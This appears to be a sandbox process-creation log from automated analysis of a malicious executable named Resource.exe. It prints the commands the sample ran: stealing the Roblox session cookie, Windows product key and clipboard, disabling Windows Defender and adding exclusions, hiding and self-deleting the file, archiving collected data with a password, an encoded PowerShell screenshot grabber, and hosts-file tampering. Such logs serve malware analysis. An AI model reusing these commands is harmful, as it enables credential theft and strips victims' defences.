              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\Resource.exe""Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
